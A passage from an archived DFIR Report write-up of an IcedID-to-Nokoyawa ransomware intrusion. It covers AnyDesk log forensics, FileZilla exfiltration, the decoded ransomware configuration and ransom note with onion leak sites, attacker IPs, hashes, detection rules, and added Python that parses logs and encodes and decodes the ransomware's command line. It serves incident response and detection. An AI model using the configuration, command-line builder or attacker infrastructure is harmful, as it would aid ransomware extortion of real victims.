Multiple people have written\r\nabout AnyDesk artifacts, such as Inversecos or TylerBrozek, which help a lot during the forensic process related to\r\nAnyDesk artifacts.\r\nFor the ad_svc.trace we can find entries like this:\r\ninfo REDACTED gsvc 6600 11452 26 anynet.any_socket - Client-ID: 485343132\r\ninfo REDACTED gsvc 6600 11452 46 anynet.any_socket - Logged in from 152.89\r\ninfo REDACTED gsvc 10136 2256 2515 anynet.any_socket - Client-ID: 547283332\r\ninfo REDACTED gsvc 10136 2256 2515 anynet.any_socket - :54241 on relay ffe9a9\r\nIP | Usage | ISP | Country | AnyDesk Client ID\r\n152.89.196.49 | AnyDesk Interactive | Starcrecium Limited | RU | 485343132\r\n185.29.9.162 | AnyDesk Interactive | DataClub | SE | 547283332\r\nExfiltration\r\nAfter the threat actors gained access to a file server in the domain, they quickly prepared this machine for\r\nexfiltration. This was performed by downloading the FileZilla FTP client installer using Internet Explorer on the\r\nserver. The threat actors were kind enough to use the sponsored version, which brought some additional PUPs along\r\nas well.\r\nShortly after, the threat actors connected from the file server, using FileZilla, to 45.155.204.5 via SSH; the key\r\nexchange can be observed in the network traffic:\r\nIP | Usage | ISP | Country | SSH Info\r\n45.155.204.5 | SSH for FileZilla | 3NT Solutions LLP | RU | Hash: c561c2cdad206b6ed8469079e037e3f9, SSH Version: ssh-2.0-filezilla_3.63.2.1\r\nThe client banner ssh-2.0-filezilla_3.63.2.1 is FileZilla’s own SSH version string, so an outbound SSH session from\r\na file server that advertises a filezilla banner is a cheap hunt on its own, independent of the destination IP.\r\nFileZilla can leave behind some useful forensic artifacts (if the installation is not removed). This blog post by\r\nArtifast gives a good overview. In this case, we were able to recover part of the .xml files, resulting in the\r\nbelow correlation between the network data and the host data. 
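Returning to the ad_svc.trace entries above: the trace ties a remote AnyDesk Client-ID to the IP it logged in from only indirectly, because the two facts sit on separate lines that share the same process and thread columns. The following added example, which is not part of the report and not AnyDesk tooling, parses a constructed excerpt in that line shape and pairs the lines up. The timestamps, the app.session line, the sequence numbers and the full IP:port for the first client are assumptions; the Client-IDs and the two source IPs are the ones reported above, and the parser also accepts the REDACTED timestamp form shown on the page.

```python
import re

# Constructed ad_svc.trace excerpt (not the report's own file). The line shape follows the
# entries quoted above; the timestamps and the first client's port are assumptions.
SAMPLE_TRACE = '''
info 2023-03-30 10:02:11.101 gsvc 6600 11452 26 anynet.any_socket - Client-ID: 485343132
info 2023-03-30 10:02:11.455 gsvc 6600 11452 46 anynet.any_socket - Logged in from 152.89.196.49:51342 on relay ffe9a9
info 2023-03-30 10:40:03.002 gsvc 6600 11452 46 app.session - Session closed
info REDACTED gsvc 10136 2256 2515 anynet.any_socket - Client-ID: 547283332
info REDACTED gsvc 10136 2256 2515 anynet.any_socket - Logged in from 185.29.9.162:54241 on relay ffe9a9
'''

# level, timestamp (anything, so REDACTED also parses), component, pid, tid, seq, module, message
LINE_RE = re.compile(r'^(info|warning|error) +(.+?) +(gsvc|gui|ctl) +([0-9]+) +([0-9]+) +([0-9]+) +([a-z_.]+) - (.*)$')
CLIENT_RE = re.compile(r'Client-ID: ([0-9]+)')
LOGIN_RE = re.compile(r'Logged in from ([0-9.]+):([0-9]+)')


def anydesk_sessions(trace_text):
    '''Pair each Client-ID line with the next Logged in from line carrying the same
    service pid and thread id, which is how the trace links a remote AnyDesk ID to
    the IP that connected with it. Returns one dict per paired session, in file order.'''
    pending = {}   # (pid, tid) -> (client_id, timestamp) announced but not yet logged in
    sessions = []
    for line in trace_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        stamp, pid, tid, message = m.group(2), m.group(4), m.group(5), m.group(8)
        cid = CLIENT_RE.search(message)
        if cid:
            pending[(pid, tid)] = (cid.group(1), stamp)
            continue
        login = LOGIN_RE.search(message)
        if login and (pid, tid) in pending:
            client_id, first_seen = pending.pop((pid, tid))
            sessions.append({'client_id': client_id, 'ip': login.group(1),
                             'port': int(login.group(2)), 'pid': int(pid),
                             'first_seen': first_seen})
    return sessions


def unexpected_sources(sessions, approved_client_ids):
    '''Sessions whose remote Client-ID is not on the approved list; an empty approved
    list (the usual state on a server that should not run AnyDesk at all) flags everything.'''
    approved = set(approved_client_ids)
    return [s for s in sessions if s['client_id'] not in approved]


if __name__ == '__main__':
    for s in unexpected_sources(anydesk_sessions(SAMPLE_TRACE), []):
        print(s)
```

The pairing on pid and tid matters because a busy host can have several AnyDesk connections in flight; matching on line adjacency alone would cross-wire them. The IPs this yields are what get enriched into the ISP and country columns of the table above.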
While each separate source was already a good\r\nfinding on its own, this combination leaves less room for guessing.\r\nImpact\r\nThirty-four days after the first infection, and about 28 hours after the beginning of hands-on activity, the threat\r\nactors proceeded to their final actions, deploying Nokoyawa ransomware. The variant of Nokoyawa was similar to\r\nthose we’ve already reported on.\r\nAs in most ransomware related cases, before actual deployment, the threat actors looked around to gather\r\ninformation related to backup functionality and systems. In this case, the threat actors moved around between a\r\nfile server and a backup server, making and viewing configurations, dropping and ‘debugging’ the ransomware\r\nand finally cleaning up.\r\nThe threat actors started by using mmc.exe to look into the Local Group Policy by using gpedit.msc. Around 20\r\nminutes later, the threat actors started executing the ransomware script on the file server.\r\nThe ransomware files, in this case svchost.exe (a masquerade of the legitimate Windows service host name, dropped\r\noutside its usual location) and an ‘automation’ file [REDACTED].1.bat, were delivered via the AnyDesk sessions,\r\nwith AnyDesk as the parent process.\r\nThe batch script, [REDACTED].1.bat, launched the executable svchost.exe with a --config parameter\r\ncontaining a base64 encoded string:\r\n{\r\nEXTENSION: \"NOKONOKO\",\r\nNOTE_NAME: \"NOKONOKO-readme.txt\",\r\nNOTE_CONTENT: \"\u003cBASE64 ENCODED NOTEBLOB\u003e\",\r\nECC_PUBLIC: \"AHpyfaG1ftdE4NNQ0laC2825GOpTwUw5Y9+WEMkAAAC0Yd7VSOy7D5CxWhHH4pzSYdCXjpPXqEZ2X2r6kgEAAA==\",\r\nSKIP_DIRS: [\r\n\"windows\",\r\n\"program files\",\r\n\"program files (x86)\",\r\n\"appdata\",\r\n\"programdata\",\r\n\"system volume information\"\r\n],\r\nSKIP_EXTS: [\r\n\".exe\",\r\n\".dll\",\r\n\".ini\",\r\n\".lnk\",\r\n\".url\"\r\n],\r\nENCRYPT_NETWORK: 
true,\r\nLOAD_HIDDEN_DRIVES: true,\r\nDELETE_SHADOW: true\r\n}\r\nNote that with DELETE_SHADOW and ENCRYPT_NETWORK set, local shadow copies offer no recovery and reachable\r\nnetwork shares are in scope as well, so running the binary on only two servers still reaches data well beyond\r\nthose two hosts.\r\nAfter the execution on the file server, the threat actors moved to the backup server, where they repeated their\r\ninterest in the Group Policy. On the backup server, they also opened the server configuration. There appeared to be\r\na problem, as there was some ‘file locking’ in place, likely preventing access. The threat actors tried to circumvent\r\nthese ‘locks’ by utilizing a tool called IOBit. This tool is capable of removing file locks.\r\nAfter this, the ransomware was deployed in the same manner as on the file server. However, there appeared to be a\r\nproblem with the deployment. The threat actors started Process Hacker and utilized Notepad++, likely to fix\r\nsomething related to the ransomware execution. This is based on the fact that the threat actors executed the\r\nransomware binary 11 times on the backup server and afterwards returned and executed the ransomware a second\r\ntime on the file server.\r\nAfter encrypting the backup server, the threat actors uninstalled the backup software using Add/Remove Programs.\r\nIn addition, Notepad was used to view the deployed ransom note after the final execution on the file server. 
The\r\nNOTE_CONTENT value (from the base64 configuration above) is itself base64 encoded; decoding it gives the\r\nfollowing ransom note:\r\nNokoyawa.\r\nIf you see this, your files have been successfully encrypted and stolen.\r\nDon't try to search free decryption method.\r\nIt's impossible.\r\nWe are using symmetrical and asymmetric encryption.\r\nATTENTION:\r\n- Don't rename encrypted files.\r\n- Don't change encrypted files.\r\n- Don't use third party software.\r\nYou are risking irreversibly damaging the file by doing this.\r\nIf you manage to keep things quiet on your end, this will never be known to the public.\r\nTo reach an agreement you have 48 hours to visit our Onion Website.\r\nHow to open Onion links:\r\n- Download TOR Browser from official website.\r\n- Open and enter this link:\r\nhttp://nokopay\u003cREDACTED\u003e\r\n- On the page you will see a chat with the Support.\r\n- Send your first message.\r\nDon't waste your time.\r\nOtherwise all your valuable and sensitive data will be leaked.\r\nOur websites are full of companies that doubted the fact of the data breach or it's extent.\r\n- http://nokoleakb76znymx443veg4n6fytx6spck6pc7nkr4dvfuygpub6jsid.onion/\r\n- http://hl66646wtlp2naoqnhattngigjp5palgqmbwixepcjyq5i534acgqyad.onion/\r\n- http://snatchteam.top\r\nThe threat actors only deployed the ransomware on the two servers and did not perform a domain-wide\r\ndeployment. 
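Recovering the ransomware configuration from the batch script is mechanical: take the --config argument, base64-decode it, parse the JSON, and base64-decode NOTE_CONTENT a second time, as described above. The added example below, which is neither the report's code nor anything from Nokoyawa itself, does exactly that on a constructed configuration that reuses the key names and skip lists shown above. The ECC_PUBLIC value and the note text are placeholders, and the bare-key fallback exists only because the rendering above shows the keys unquoted, so the parser accepts both the strict and the unquoted form.

```python
import base64
import json
import re

_DQ = chr(34)  # the double-quote character, built at runtime so the source stays free of it

# Constructed configuration: same keys and lists as the blob shown above, but a
# placeholder ECC key and a shortened note. Not the actual Nokoyawa configuration.
_NOTE_TEXT = 'Nokoyawa. If you see this, your files have been successfully encrypted and stolen.'
SAMPLE_CONFIG = {
    'EXTENSION': 'NOKONOKO',
    'NOTE_NAME': 'NOKONOKO-readme.txt',
    'NOTE_CONTENT': base64.b64encode(_NOTE_TEXT.encode()).decode(),
    'ECC_PUBLIC': base64.b64encode(bytes(range(64))).decode(),  # placeholder, not the real key
    'SKIP_DIRS': ['windows', 'program files', 'program files (x86)', 'appdata',
                  'programdata', 'system volume information'],
    'SKIP_EXTS': ['.exe', '.dll', '.ini', '.lnk', '.url'],
    'ENCRYPT_NETWORK': True,
    'LOAD_HIDDEN_DRIVES': True,
    'DELETE_SHADOW': True,
}

# Matches an unquoted key such as   EXTENSION:   at the start of the object or after a comma.
_BARE_KEY = re.compile('(^|[{,])([ ]*)([A-Z_][A-Z0-9_]*)([ ]*):', re.MULTILINE)


def build_command_line(config, exe='svchost.exe', bare_keys=False):
    '''Serialise a config the way the batch script passed it: exe --config <base64>.
    bare_keys=True strips the quotes around keys, reproducing the rendering shown above.'''
    text = json.dumps(config)
    if bare_keys:
        text = re.sub(_DQ + '([A-Z_]+)' + _DQ + ':', lambda m: m.group(1) + ':', text)
    return exe + ' --config ' + base64.b64encode(text.encode()).decode()


def decode_config(command_line):
    '''Extract the --config argument, base64-decode it, parse it (quoting bare keys
    if strict JSON parsing fails) and decode the nested ransom note into NOTE_TEXT.'''
    tokens = command_line.split()
    if '--config' not in tokens or tokens.index('--config') + 1 >= len(tokens):
        raise ValueError('no --config argument on the command line')
    text = base64.b64decode(tokens[tokens.index('--config') + 1]).decode('utf-8')
    try:
        cfg = json.loads(text)
    except json.JSONDecodeError:
        quoted = _BARE_KEY.sub(lambda m: m.group(1) + m.group(2) + _DQ + m.group(3) + _DQ + ':', text)
        cfg = json.loads(quoted)
    cfg['NOTE_TEXT'] = base64.b64decode(cfg['NOTE_CONTENT']).decode('utf-8', errors='replace')
    return cfg


def triage_summary(cfg):
    '''The fields an analyst wants first: extension, note name, shadow copy deletion
    and whether network shares are in scope.'''
    return {
        'extension': cfg['EXTENSION'],
        'note_name': cfg['NOTE_NAME'],
        'deletes_shadow_copies': bool(cfg.get('DELETE_SHADOW')),
        'encrypts_network_shares': bool(cfg.get('ENCRYPT_NETWORK')),
        'skipped_extensions': list(cfg.get('SKIP_EXTS', [])),
    }


if __name__ == '__main__':
    line = build_command_line(SAMPLE_CONFIG, bare_keys=True)
    cfg = decode_config(line)
    print(triage_summary(cfg))
    print(cfg['NOTE_TEXT'])
```

In practice the command line comes straight from process creation telemetry (Sysmon event 1 or the batch file itself), so the decoder can run during triage before the sample is ever detonated; the extension and note name it returns are the first things to sweep the rest of the estate for.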
After the ransom of these two systems, the threat actor’s activity ceased.\r\nPlease consider leaving feedback on this report here.\r\nTimeline\r\nDiamond Model\r\nIndicators\r\nAtomic\r\nIcedID\r\nmrassociattes[.]com (174.138.188.6)\r\naerilaponawki[.]com (193.149.129.131)\r\nklindriverfor[.]com (5.255.102.167)\r\nalishaskainz[.]com (dr)\r\nCobalt Strike\r\nmsc-mvc-updates[.]com (91.215.85.183)\r\nFileZilla File Exfiltration\r\n45.155.204.5\r\nComputed\r\nContract_02_21_Copy#909.one\r\nMD5: 5f4d630ef00656726401b205ae4dc88f\r\nSHA1: aa8f2d6d98aa535e05685076ca02f781c2aa6464\r\nSHA256: 9c337d27dab65fc3f4b88666338e13416f218ab75c4b5e37cc396241c225efe8\r\nCOIm.jpg\r\nMD5: d1da347e78bf043e2dc61638e946c3da\r\nSHA1: d87a3c22771b1106a1a52d96df7b2944d93fa184\r\nSHA256: 1ab812f7d829444dc703eeb02ea0a955ec839d5e2a9b619d44ac09a91135cad1\r\nGET_ID.bat\r\nMD5: a59a7916156c52f732b4c2e321facfe1\r\nSHA1: 8c949a7769d16c285347f650ef2eedac01dc1805\r\nSHA256: eae2bce6341ff7059b9382bfa0e0daa337ea9948dd729c0c1e1ee9c11c1c0068\r\nINSTALL.ps1\r\nMD5: b1f5e4774aa79f643350218df61e33f6\r\nSHA1: f1e7994c6568f0182a60f64557c7793df5e550ed\r\nSHA256: b378c2aa759625de2ad1be2c4045381d7474b82df7eb47842dc194bb9a134f76\r\nagaloz.dll\r\nMD5: 76a1f94ed6499b99d2cc500998846875\r\nSHA1: ca14d61bcf038cda45199f54c7c452ad262a7c88\r\nSHA256: d6127d614309acbf2a630fe3fb0fda8e4079dcf2045f91aa400d179751d425f7\r\ncsrss.exe/Funa2.exe\r\nMD5: f927cd4f40c7a6dad769a8f9af771a8c\r\nSHA1: 0fdfef7c9cc4305df81b006e898e1592aa822437\r\nSHA256: 06bbb36baf63bc5cb14d7f097745955a4854a62fa3acef4d80c61b4fa002c542\r\nsvchost.exe\r\nMD5: 8800e6f1501f69a0a04ce709e9fa251c\r\nSHA1: 72a1c9ea93d18309769d8be5cdb3daedf1cddcf5\r\nSHA256: 3c9f4145e310f616bd5e36ca177a3f370edc13cf2d54bb87fe99972ecf3f09b4\r\nDetections\r\nNetwork\r\nET MALWARE Observed DNS Query to IcedID Domain (qoipaboni .com)\r\nET MALWARE Win32/IcedID Request Cookie\r\nET INFO Windows Powershell User-Agent Usage\r\nETPRO INFO HTTP Request with Lowercase accept Header Observed\r\nET MALWARE Cobalt Strike Malleable C2 (Unknown Profile)\r\nET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection\r\nET POLICY SMB2 NT Create AndX Request For an Executable File\r\nET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection\r\nET POLICY HTTP traffic on port 443 (POST)\r\nET POLICY SMB2 NT Create AndX Request For a DLL File - Possible Lateral Movement\r\nET SCAN Potential SSH Scan OUTBOUND\r\nET HUNTING Possible Powershell .ps1 Script Use Over SMB\r\nET POLICY SMB2 NT Create AndX Request For a Powershell .ps1 File\r\nET HUNTING Suspicious csrss.exe in URI\r\nET INFO Executable Download from dotted-quad Host\r\nET INFO Dotted Quad Host DLL Request\r\nSigma\r\nSearch rules on detection.fyi or sigmasearchengine.com\r\nDFIR Public Rules Repo:\r\nb26feb0b-8891-4e66-b2e7-ec91dc045d58 : AnyDesk Network\r\n50046619-1037-49d7-91aa-54fc92923604 : AdFind Discovery\r\n8a0d153f-b4e4-4ea7-9335-892dfbe17221 : NetScan Share Enumeration Write Access Check\r\nDFIR Private Rules:\r\nbaa9adf9-a01c-4c43-ac57-347b630bf69e : Default Cobalt Strike Named Pipes\r\na526e0c3-d53b-4d61-82a1-76d3d1358a30 : Silent Installation of AnyDesk RMM\r\nb526e0c3-d53b-4d61-82a1-76d3d1358a31 : AnyDesk RMM Password Setup via Command Line\r\n624f1f33-ee38-4bbe-9f4a-088014e0c26b : IcedID Malware Execution Patterns\r\n37948baa-5310-424c-bb18-b29c56be160f : Suspicious Execution of DLL with Unusual File Extensions\r\nSigma Repo:\r\n530a6faa-ff3d-4022-b315-50828e77eef5 : Anydesk Remote Access Software Service Installation\r\n114e7f1c-f137-48c8-8f54-3088c24ce4b9 : Remote Access Tool - AnyDesk Silent Installation\r\nb52e84a3-029e-4529-b09b-71d19dd27e94 : Remote Access Tool - AnyDesk Execution\r\nb1377339-fda6-477a-b455-ac0923f9ec2c : Remote Access Tool - AnyDesk Piped Password Via CLI\r\n065b00ca-5d5c-4557-ac95-64a6d0b64d86 : Remote Access Tool - Anydesk Execution From Suspicious Folder\r\n9a132afa-654e-11eb-ae93-0242ac130002 : PUA - AdFind Suspicious Execution\r\n903076ff-f442-475a-b667-4f246bcc203b : Nltest.EXE Execution\r\n5cc90652-4cbd-4241-aa3b-4b462fa5a248 : Potential Recon Activity Via Nltest.EXE\r\n0ef56343-059e-4cb6-adc1-4c3c967c5e46 : Suspicious Execution of Systeminfo\r\n968eef52-9cff-4454-8992-1e74b9cbad6c : Reconnaissance Activity\r\ne568650b-5dcd-4658-8f34-ded0b1e13992 : Potential Product Class Reconnaissance Via Wmic.EXE\r\nfcc6d700-68d9-4241-9a1a-06874d621b06 : Suspicious File Created Via OneNote Application\r\nd5601f8c-b26f-4ab0-9035-69e11a8d4ad2 : CobaltStrike Named Pipe\r\n811e0002-b13b-4a15-9d00-a613fce66e42 : PUA - Process Hacker Execution\r\nd5866ddf-ce8f-4aea-b28e-d96485a20d3d : Files With System Process Name In Unsuspected Locations\r\n96036718-71cc-4027-a538-d1587e0006a7 : Windows Processes Suspicious Parent Directory\r\nc8557060-9221-4448-8794-96320e6f3e74 : Windows PowerShell User Agent\r\nJoeSecurity Repo:\r\n200068 : Execute DLL with spoofed extension\r\nYara\r\nhttps://github.com/The-DFIR-Report/Yara-Rules/blob/main/19772/19772.yar\r\nMITRE\r\nCredentials In Files - T1552.001\r\nData Encrypted for Impact - T1486\r\nData from Network Shared Drive - T1039\r\nDomain Groups - T1069.002\r\nDomain Trust Discovery - T1482\r\nExfiltration Over Alternative Protocol - T1048\r\nFile and Directory Discovery - T1083\r\nIndicator Removal - T1070\r\nIngress Tool Transfer - T1105\r\nLSASS Memory - T1003.001\r\nMalicious File - T1204.002\r\nMasquerade File Type - T1036.008\r\nMasquerading - T1036\r\nNetwork Service Discovery - T1046\r\nPhishing - T1566\r\nPowerShell - T1059.001\r\nProcess Discovery - T1057\r\nProcess Injection - T1055\r\nRegsvr32 - T1218.010\r\nRemote Access Software - T1219\r\nRemote Desktop Protocol - T1021.001\r\nRemote System Discovery - T1018\r\nRundll32 - T1218.011\r\nScheduled Task - T1053.005\r\nSecurity Software Discovery - T1518.001\r\nSystem Information Discovery - T1082\r\nSystem Owner/User Discovery - T1033\r\nWeb Protocols - T1071.001\r\nWindows Command Shell - T1059.003\r\nWindows Service - T1543.003\r\nInternal case #19772\r\nSource: https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/"
	],
	"report_names": [
		"from-onenote-to-ransomnote-an-ice-cold-intrusion"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434078,
	"ts_updated_at": 1775826732,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/051a69981cfdec4db89081a317572b13207fe85a.pdf",
		"text": "https://archive.orkl.eu/051a69981cfdec4db89081a317572b13207fe85a.txt",
		"img": "https://archive.orkl.eu/051a69981cfdec4db89081a317572b13207fe85a.jpg"
	}
}